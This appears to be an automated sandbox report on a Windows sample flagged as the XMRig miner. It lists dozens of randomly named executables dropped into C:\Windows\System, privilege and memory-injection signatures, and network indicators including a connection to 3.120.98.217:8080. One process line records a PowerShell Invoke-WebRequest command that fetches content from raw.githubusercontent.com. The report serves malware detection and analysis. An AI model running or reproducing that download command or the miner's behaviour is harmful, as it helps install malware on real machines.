C:\Windows\System\UTNiJFr.exe

C:\Windows\System\rWwpsMS.exe

C:\Windows\System\rWwpsMS.exe

C:\Windows\System\jafOQot.exe

C:\Windows\System\jafOQot.exe

C:\Windows\System\gQtcykB.exe

C:\Windows\System\gQtcykB.exe

C:\Windows\System\KFVpFos.exe

C:\Windows\System\KFVpFos.exe

C:\Windows\System\UTkfSsP.exe

C:\Windows\System\UTkfSsP.exe

C:\Windows\System\UBKYAkk.exe

C:\Windows\System\UBKYAkk.exe

C:\Windows\System\jvIFDHC.exe

C:\Windows\System\jvIFDHC.exe

C:\Windows\System\JWWljQn.exe

C:\Windows\System\JWWljQn.exe

C:\Windows\System\vkPnoTD.exe

C:\Windows\System\vkPnoTD.exe

C:\Windows\System\ubgOdnV.exe

C:\Windows\System\ubgOdnV.exe

C:\Windows\System\DdMAZwQ.exe

C:\Windows\System\DdMAZwQ.exe

C:\Windows\System\nrcgaQw.exe

C:\Windows\System\nrcgaQw.exe

C:\Windows\System\GFUkdXk.exe

C:\Windows\System\GFUkdXk.exe

C:\Windows\System\wqJsqvJ.exe

C:\Windows\System\wqJsqvJ.exe

C:\Windows\System\YgzUzQB.exe

C:\Windows\System\YgzUzQB.exe

C:\Windows\System\GzhaRAg.exe

C:\Windows\System\GzhaRAg.exe

C:\Windows\System\mudQsew.exe

C:\Windows\System\mudQsew.exe

C:\Windows\System\IhErMLG.exe

C:\Windows\System\IhErMLG.exe

C:\Windows\System\BCYpymd.exe

C:\Windows\System\BCYpymd.exe

C:\Windows\System\VYEbPsk.exe

C:\Windows\System\VYEbPsk.exe

C:\Windows\System\VWQoVBQ.exe

C:\Windows\System\VWQoVBQ.exe

C:\Windows\System\JivFKIT.exe

C:\Windows\System\JivFKIT.exe

C:\Windows\System\PlGKXgX.exe

C:\Windows\System\PlGKXgX.exe

C:\Windows\System\eIlqnsl.exe

C:\Windows\System\eIlqnsl.exe

C:\Windows\System\WUtHQVm.exe

C:\Windows\System\WUtHQVm.exe

C:\Windows\System\bfEBLJc.exe

C:\Windows\System\bfEBLJc.exe

C:\Windows\System\WpWsLEm.exe

C:\Windows\System\WpWsLEm.exe

C:\Windows\System\IHcyTCL.exe

C:\Windows\System\IHcyTCL.exe

C:\Windows\System\lGdebxq.exe

C:\Windows\System\lGdebxq.exe

C:\Windows\System\iftXmky.exe

C:\Windows\System\iftXmky.exe

C:\Windows\System\EzGFEcG.exe

C:\Windows\System\EzGFEcG.exe

C:\Windows\System\PAYrPRt.exe

C:\Windows\System\PAYrPRt.exe

C:\Windows\System\ElMpboy.exe

C:\Windows\System\ElMpboy.exe

C:\Windows\System\TUrhplR.exe

C:\Windows\System\TUrhplR.exe

C:\Windows\System\DnFefmk.exe

C:\Windows\System\DnFefmk.exe

C:\Windows\System\GYvUPtY.exe

C:\Windows\System\GYvUPtY.exe

C:\Windows\System\mhklLHF.exe

C:\Windows\System\mhklLHF.exe

C:\Windows\System\eFHPoRg.exe

C:\Windows\System\eFHPoRg.exe

C:\Windows\System\ANsqpuQ.exe

C:\Windows\System\ANsqpuQ.exe

C:\Windows\System\GuNZfCD.exe

C:\Windows\System\GuNZfCD.exe

C:\Windows\System\ccOLRGJ.exe

C:\Windows\System\ccOLRGJ.exe

C:\Windows\System\UMSAYqx.exe

C:\Windows\System\UMSAYqx.exe

C:\Windows\System\YEVGPGb.exe

C:\Windows\System\YEVGPGb.exe

C:\Windows\System\nQFHOFk.exe

C:\Windows\System\nQFHOFk.exe

C:\Windows\System\knTIzdK.exe

C:\Windows\System\knTIzdK.exe

C:\Windows\System\PREjBtF.exe

C:\Windows\System\PREjBtF.exe

C:\Windows\System\PqrKYzE.exe

C:\Windows\System\PqrKYzE.exe

C:\Windows\System\MeebXhU.exe

C:\Windows\System\MeebXhU.exe

C:\Windows\System\sJQXAWi.exe

C:\Windows\System\sJQXAWi.exe

C:\Windows\System\UxWlpBQ.exe

C:\Windows\System\UxWlpBQ.exe

C:\Windows\System\glKEvBA.exe

C:\Windows\System\glKEvBA.exe

C:\Windows\System\nBhEmLe.exe

C:\Windows\System\nBhEmLe.exe

C:\Windows\System\gFZGAPx.exe

C:\Windows\System\gFZGAPx.exe

C:\Windows\System\ychOdzx.exe

C:\Windows\System\ychOdzx.exe

C:\Windows\System\dfnjLSE.exe

C:\Windows\System\dfnjLSE.exe

C:\Windows\System\YJlAkGs.exe

C:\Windows\System\YJlAkGs.exe

C:\Windows\System\mBgSUof.exe

C:\Windows\System\mBgSUof.exe

C:\Windows\System\NXmommC.exe

C:\Windows\System\NXmommC.exe

C:\Windows\System\HogcVQx.exe

C:\Windows\System\HogcVQx.exe

C:\Windows\System\qIBEJbR.exe

C:\Windows\System\qIBEJbR.exe

C:\Windows\System\gpMNWsX.exe

C:\Windows\System\gpMNWsX.exe

C:\Windows\System\ThPAYRk.exe

C:\Windows\System\ThPAYRk.exe

C:\Windows\System\jhRFdWe.exe

C:\Windows\System\jhRFdWe.exe

C:\Windows\System\ETfyjxB.exe

C:\Windows\System\ETfyjxB.exe

C:\Windows\System\ZYlnvef.exe

C:\Windows\System\ZYlnvef.exe

C:\Windows\System\YfeKykl.exe

C:\Windows\System\YfeKykl.exe

C:\Windows\System\GHJSluA.exe

C:\Windows\System\GHJSluA.exe

C:\Windows\System\NTOGraj.exe

C:\Windows\System\NTOGraj.exe

C:\Windows\System\hvhTDoE.exe

C:\Windows\System\hvhTDoE.exe

C:\Windows\System\fOyXbLj.exe

C:\Windows\System\fOyXbLj.exe

C:\Windows\System\hMjxQUZ.exe

C:\Windows\System\hMjxQUZ.exe

C:\Windows\System\cjYsRDg.exe

C:\Windows\System\cjYsRDg.exe

C:\Windows\System\pokJAvf.exe

C:\Windows\System\pokJAvf.exe

C:\Windows\System\stxCVIy.exe

C:\Windows\System\stxCVIy.exe

C:\Windows\System\aIOvqJf.exe

C:\Windows\System\aIOvqJf.exe

C:\Windows\System\FdYjphq.exe

C:\Windows\System\FdYjphq.exe

C:\Windows\System\vCaojvI.exe

C:\Windows\System\vCaojvI.exe

C:\Windows\System\yDyQxdR.exe

C:\Windows\System\yDyQxdR.exe

C:\Windows\System\cOaYKlL.exe

C:\Windows\System\cOaYKlL.exe

C:\Windows\System\nBOWNUr.exe

C:\Windows\System\nBOWNUr.exe

C:\Windows\System\laTzMWK.exe

C:\Windows\System\laTzMWK.exe

C:\Windows\System\uTLXYPI.exe

C:\Windows\System\uTLXYPI.exe

C:\Windows\System\gdxpjbS.exe

C:\Windows\System\gdxpjbS.exe

C:\Windows\System\NRayXYl.exe

C:\Windows\System\NRayXYl.exe

C:\Windows\System\HvOoARC.exe

C:\Windows\System\HvOoARC.exe

C:\Windows\System\FxbxyMx.exe

C:\Windows\System\FxbxyMx.exe

C:\Windows\System\ibxZRNb.exe

C:\Windows\System\ibxZRNb.exe

C:\Windows\System\VxWXRCC.exe

C:\Windows\System\VxWXRCC.exe

C:\Windows\System\ICJBvSF.exe

C:\Windows\System\ICJBvSF.exe

C:\Windows\System\bWvBVaw.exe

C:\Windows\System\bWvBVaw.exe

C:\Windows\System\zcpxSEX.exe

C:\Windows\System\zcpxSEX.exe

C:\Windows\System\mfwejBR.exe

C:\Windows\System\mfwejBR.exe

C:\Windows\System\uHGFxIG.exe

C:\Windows\System\uHGFxIG.exe

C:\Windows\System\KEiZUIY.exe

C:\Windows\System\KEiZUIY.exe

C:\Windows\System\KTeeuKl.exe

C:\Windows\System\KTeeuKl.exe

C:\Windows\System\XJfcuXm.exe

C:\Windows\System\XJfcuXm.exe

C:\Windows\System\xWvHiDd.exe

C:\Windows\System\xWvHiDd.exe

C:\Windows\System\ECIOAPt.exe

C:\Windows\System\ECIOAPt.exe

C:\Windows\System\hfNfYjo.exe

C:\Windows\System\hfNfYjo.exe

C:\Windows\System\lPrEDyk.exe

C:\Windows\System\lPrEDyk.exe

C:\Windows\System\vuAeFFt.exe

C:\Windows\System\vuAeFFt.exe

C:\Windows\System\XtVyfVZ.exe

C:\Windows\System\XtVyfVZ.exe

C:\Windows\System\ajRfbMe.exe

C:\Windows\System\ajRfbMe.exe

C:\Windows\System\mFHTsgp.exe

C:\Windows\System\mFHTsgp.exe

C:\Windows\System\zuznbJl.exe

C:\Windows\System\zuznbJl.exe

C:\Windows\System\IUAzLdw.exe

C:\Windows\System\IUAzLdw.exe

C:\Windows\System\NDABwHA.exe

C:\Windows\System\NDABwHA.exe

C:\Windows\System\YWrVxwE.exe

C:\Windows\System\YWrVxwE.exe

C:\Windows\System\SHSDPJX.exe

C:\Windows\System\SHSDPJX.exe

C:\Windows\System\yTzpXmu.exe

C:\Windows\System\yTzpXmu.exe

C:\Windows\System\GrRuKUe.exe

C:\Windows\System\GrRuKUe.exe

C:\Windows\System\hcujgKW.exe

C:\Windows\System\hcujgKW.exe

C:\Windows\System\ZtHeMPh.exe

C:\Windows\System\ZtHeMPh.exe

C:\Windows\System\eUExlHh.exe

C:\Windows\System\eUExlHh.exe

C:\Windows\System\zCSmmEJ.exe

C:\Windows\System\zCSmmEJ.exe

C:\Windows\System\TsaOkiQ.exe

C:\Windows\System\TsaOkiQ.exe

C:\Windows\System\mKhrAdq.exe

C:\Windows\System\mKhrAdq.exe

C:\Windows\System\UvGVpfz.exe

C:\Windows\System\UvGVpfz.exe

C:\Windows\System\clMQuEc.exe

C:\Windows\System\clMQuEc.exe

C:\Windows\System\EIWspgq.exe

C:\Windows\System\EIWspgq.exe

C:\Windows\System\VQECKnm.exe

C:\Windows\System\VQECKnm.exe

C:\Windows\System\rRhvIjL.exe

C:\Windows\System\rRhvIjL.exe

C:\Windows\System\HrMWAAU.exe

C:\Windows\System\HrMWAAU.exe

C:\Windows\System\PMnokSJ.exe

C:\Windows\System\PMnokSJ.exe

C:\Windows\System\atarXeQ.exe

C:\Windows\System\atarXeQ.exe

C:\Windows\System\Ynjozni.exe

C:\Windows\System\Ynjozni.exe

C:\Windows\System\DddZakD.exe

C:\Windows\System\DddZakD.exe

C:\Windows\System\odBAwJx.exe

C:\Windows\System\odBAwJx.exe

C:\Windows\System\FcSuGCx.exe

C:\Windows\System\FcSuGCx.exe

C:\Windows\System\VtNgSMd.exe

C:\Windows\System\VtNgSMd.exe

C:\Windows\System\BKwosZM.exe

C:\Windows\System\BKwosZM.exe

C:\Windows\System\kUaQtFw.exe

C:\Windows\System\kUaQtFw.exe

C:\Windows\System\yATWRbb.exe

C:\Windows\System\yATWRbb.exe

C:\Windows\System\DJWpajW.exe

C:\Windows\System\DJWpajW.exe

C:\Windows\System\WqifDYz.exe

C:\Windows\System\WqifDYz.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 09:29

Reported

2024-06-12 09:31

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2620 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\rIIWHrs.exe
PID 2620 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\lTotpOg.exe
PID 2620 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\lTotpOg.exe
PID 2620 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\yfNNjbg.exe
PID 2620 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\yfNNjbg.exe
PID 2620 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\qPmzhyd.exe
PID 2620 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\qPmzhyd.exe
PID 2620 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sbvCWoC.exe
PID 2620 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\sbvCWoC.exe
PID 2620 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wMkGpUg.exe
PID 2620 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wMkGpUg.exe
PID 2620 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JwZwQqw.exe
PID 2620 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\JwZwQqw.exe
PID 2620 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PBUepdr.exe
PID 2620 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\PBUepdr.exe
PID 2620 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CiOoxmx.exe
PID 2620 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\CiOoxmx.exe
PID 2620 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\axQMDcr.exe
PID 2620 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\axQMDcr.exe
PID 2620 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\knpZHZg.exe
PID 2620 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\knpZHZg.exe
PID 2620 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wFVmnam.exe
PID 2620 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\wFVmnam.exe
PID 2620 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\IRmpEsL.exe
PID 2620 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\IRmpEsL.exe
PID 2620 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\LrbSXam.exe
PID 2620 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe C:\Windows\System\LrbSXam.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\QnLdAgM.exe

C:\Windows\System\VAvxbkI.exe

C:\Windows\System\VAvxbkI.exe

C:\Windows\System\NSJQSxO.exe

C:\Windows\System\NSJQSxO.exe

C:\Windows\System\msPYkOZ.exe

C:\Windows\System\msPYkOZ.exe

C:\Windows\System\hyEqAxJ.exe

C:\Windows\System\hyEqAxJ.exe

C:\Windows\System\cNNcbql.exe

C:\Windows\System\cNNcbql.exe

C:\Windows\System\wcocDBe.exe

C:\Windows\System\wcocDBe.exe

C:\Windows\System\NoXOywe.exe

C:\Windows\System\NoXOywe.exe

C:\Windows\System\wZZYvzU.exe

C:\Windows\System\wZZYvzU.exe

C:\Windows\System\BfJUJrN.exe

C:\Windows\System\BfJUJrN.exe

C:\Windows\System\VmtOgfb.exe

C:\Windows\System\VmtOgfb.exe

C:\Windows\System\JUDSYzn.exe

C:\Windows\System\JUDSYzn.exe

C:\Windows\System\hThTUGi.exe

C:\Windows\System\hThTUGi.exe

C:\Windows\System\UBeHlhU.exe

C:\Windows\System\UBeHlhU.exe

C:\Windows\System\hogRpKL.exe

C:\Windows\System\hogRpKL.exe

C:\Windows\System\dGigriD.exe

C:\Windows\System\dGigriD.exe

C:\Windows\System\iMIHKUL.exe

C:\Windows\System\iMIHKUL.exe

C:\Windows\System\PHRyOHH.exe

C:\Windows\System\PHRyOHH.exe

C:\Windows\System\WzCVEKO.exe

C:\Windows\System\WzCVEKO.exe

C:\Windows\System\eCbOGDK.exe

C:\Windows\System\eCbOGDK.exe

C:\Windows\System\mvgmKBm.exe

C:\Windows\System\mvgmKBm.exe

C:\Windows\System\Exygniw.exe

C:\Windows\System\Exygniw.exe

C:\Windows\System\AUZbmUm.exe

C:\Windows\System\AUZbmUm.exe

C:\Windows\System\CpZisqc.exe

C:\Windows\System\CpZisqc.exe

C:\Windows\System\veaENnb.exe

C:\Windows\System\veaENnb.exe

C:\Windows\System\xGPRpVj.exe

C:\Windows\System\xGPRpVj.exe

C:\Windows\System\fsQMUVd.exe

C:\Windows\System\fsQMUVd.exe

C:\Windows\System\REbLqeO.exe

C:\Windows\System\REbLqeO.exe

C:\Windows\System\JhSPpQG.exe

C:\Windows\System\JhSPpQG.exe

C:\Windows\System\mLaiqLk.exe

C:\Windows\System\mLaiqLk.exe

C:\Windows\System\qOlzYuH.exe

C:\Windows\System\qOlzYuH.exe

C:\Windows\System\RYYQsyV.exe

C:\Windows\System\RYYQsyV.exe

C:\Windows\System\Bjzhrbb.exe

C:\Windows\System\Bjzhrbb.exe

C:\Windows\System\bfbSyfE.exe

C:\Windows\System\bfbSyfE.exe

C:\Windows\System\BJrAMLC.exe

C:\Windows\System\BJrAMLC.exe

C:\Windows\System\ilDhWkI.exe

C:\Windows\System\ilDhWkI.exe

C:\Windows\System\jydTgmt.exe

C:\Windows\System\jydTgmt.exe

C:\Windows\System\mhxRyUt.exe

C:\Windows\System\mhxRyUt.exe

C:\Windows\System\vopstbz.exe

C:\Windows\System\vopstbz.exe

C:\Windows\System\pNXVTKl.exe

C:\Windows\System\pNXVTKl.exe

C:\Windows\System\ramVozV.exe

C:\Windows\System\ramVozV.exe

C:\Windows\System\nJHLmzW.exe

C:\Windows\System\nJHLmzW.exe

C:\Windows\System\EySLZzK.exe

C:\Windows\System\EySLZzK.exe

C:\Windows\System\fuVszcA.exe

C:\Windows\System\fuVszcA.exe

C:\Windows\System\VXzkntI.exe

C:\Windows\System\VXzkntI.exe

C:\Windows\System\hKvNPYq.exe

C:\Windows\System\hKvNPYq.exe

C:\Windows\System\yksQOSJ.exe

C:\Windows\System\yksQOSJ.exe

C:\Windows\System\dhAMniF.exe

C:\Windows\System\dhAMniF.exe

C:\Windows\System\sgBMBeJ.exe

C:\Windows\System\sgBMBeJ.exe

C:\Windows\System\yGQrmxU.exe

C:\Windows\System\yGQrmxU.exe

C:\Windows\System\llqVxvq.exe

C:\Windows\System\llqVxvq.exe

C:\Windows\System\ocxbKRe.exe

C:\Windows\System\ocxbKRe.exe

C:\Windows\System\NRjoTbP.exe

C:\Windows\System\NRjoTbP.exe

C:\Windows\System\taFbxIx.exe

C:\Windows\System\taFbxIx.exe

C:\Windows\System\zADjkqK.exe

C:\Windows\System\zADjkqK.exe

C:\Windows\System\amxChkB.exe

C:\Windows\System\amxChkB.exe

C:\Windows\System\vBDjfvz.exe

C:\Windows\System\vBDjfvz.exe

C:\Windows\System\YffVDfx.exe

C:\Windows\System\YffVDfx.exe

C:\Windows\System\IwCGTww.exe

C:\Windows\System\IwCGTww.exe

C:\Windows\System\UaicJju.exe

C:\Windows\System\UaicJju.exe

C:\Windows\System\qSopXDG.exe

C:\Windows\System\qSopXDG.exe

C:\Windows\System\aYjtMtU.exe

C:\Windows\System\aYjtMtU.exe

C:\Windows\System\eNjEqtR.exe

C:\Windows\System\eNjEqtR.exe

C:\Windows\System\JZKsSQC.exe

C:\Windows\System\JZKsSQC.exe

C:\Windows\System\fiEqngT.exe

C:\Windows\System\fiEqngT.exe

C:\Windows\System\eOsJzRN.exe

C:\Windows\System\eOsJzRN.exe

C:\Windows\System\lEEJlzY.exe

C:\Windows\System\lEEJlzY.exe

C:\Windows\System\xMJeRXH.exe

C:\Windows\System\xMJeRXH.exe

C:\Windows\System\ORitZJy.exe

C:\Windows\System\ORitZJy.exe

C:\Windows\System\FNBtCIM.exe

C:\Windows\System\FNBtCIM.exe

C:\Windows\System\XOaNwnf.exe

C:\Windows\System\XOaNwnf.exe

C:\Windows\System\SvEfVMl.exe

C:\Windows\System\SvEfVMl.exe

C:\Windows\System\nVDWmbC.exe

C:\Windows\System\nVDWmbC.exe

C:\Windows\System\xapbEgL.exe

C:\Windows\System\xapbEgL.exe

C:\Windows\System\MURnXxl.exe

C:\Windows\System\MURnXxl.exe

C:\Windows\System\ruvzHmh.exe

C:\Windows\System\ruvzHmh.exe

C:\Windows\System\YVwhnEs.exe

C:\Windows\System\YVwhnEs.exe

C:\Windows\System\xrjgIoP.exe

C:\Windows\System\xrjgIoP.exe

C:\Windows\System\fzQxGBZ.exe

C:\Windows\System\fzQxGBZ.exe

C:\Windows\System\eKkVCPu.exe

C:\Windows\System\eKkVCPu.exe

C:\Windows\System\SppQSDr.exe

C:\Windows\System\SppQSDr.exe

C:\Windows\System\ATxkOMM.exe

C:\Windows\System\ATxkOMM.exe

C:\Windows\System\NQXdkjs.exe

C:\Windows\System\NQXdkjs.exe

C:\Windows\System\bJQxMRI.exe

C:\Windows\System\bJQxMRI.exe

C:\Windows\System\CoBNDFH.exe

C:\Windows\System\CoBNDFH.exe

C:\Windows\System\AhErxyv.exe

C:\Windows\System\AhErxyv.exe

C:\Windows\System\kNbOBkV.exe

C:\Windows\System\kNbOBkV.exe

C:\Windows\System\xWrYWsN.exe

C:\Windows\System\xWrYWsN.exe

C:\Windows\System\WCrkNFt.exe

C:\Windows\System\WCrkNFt.exe

C:\Windows\System\ZvdMcDt.exe

C:\Windows\System\ZvdMcDt.exe

C:\Windows\System\EzYNpos.exe

C:\Windows\System\EzYNpos.exe

C:\Windows\System\FpXNHfF.exe

C:\Windows\System\FpXNHfF.exe

C:\Windows\System\pPjFvRm.exe

C:\Windows\System\pPjFvRm.exe

C:\Windows\System\UjwXTuw.exe

C:\Windows\System\UjwXTuw.exe

C:\Windows\System\ySXZkMz.exe

C:\Windows\System\ySXZkMz.exe

C:\Windows\System\JXEavEn.exe

C:\Windows\System\JXEavEn.exe

C:\Windows\System\UHyXWVt.exe

C:\Windows\System\UHyXWVt.exe

C:\Windows\System\DEBjCYr.exe

C:\Windows\System\DEBjCYr.exe

C:\Windows\System\rhCQeFt.exe

C:\Windows\System\rhCQeFt.exe

C:\Windows\System\IdePnWZ.exe

C:\Windows\System\IdePnWZ.exe

C:\Windows\System\gneAoZz.exe

C:\Windows\System\gneAoZz.exe

C:\Windows\System\PyrfKfX.exe

C:\Windows\System\PyrfKfX.exe

C:\Windows\System\KTWvvzI.exe

C:\Windows\System\KTWvvzI.exe

C:\Windows\System\UuNZJeO.exe

C:\Windows\System\UuNZJeO.exe

C:\Windows\System\sVJtZKs.exe

C:\Windows\System\sVJtZKs.exe

C:\Windows\System\sSakUjY.exe

C:\Windows\System\sSakUjY.exe

C:\Windows\System\wdkFxnv.exe

C:\Windows\System\wdkFxnv.exe

C:\Windows\System\qVQboVi.exe

C:\Windows\System\qVQboVi.exe

C:\Windows\System\ywkWnrD.exe

C:\Windows\System\ywkWnrD.exe

C:\Windows\System\UusBttD.exe

C:\Windows\System\UusBttD.exe

C:\Windows\System\SLRDzNe.exe

C:\Windows\System\SLRDzNe.exe

C:\Windows\System\uhxSQUE.exe

C:\Windows\System\uhxSQUE.exe

C:\Windows\System\QFQifrs.exe

C:\Windows\System\QFQifrs.exe

C:\Windows\System\WuSFbrI.exe

C:\Windows\System\WuSFbrI.exe

C:\Windows\System\SJwMAgW.exe

C:\Windows\System\SJwMAgW.exe

C:\Windows\System\zesFrcP.exe

C:\Windows\System\zesFrcP.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 131.253.33.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
BE 88.221.83.201:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 237.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 201.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.227.13:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files
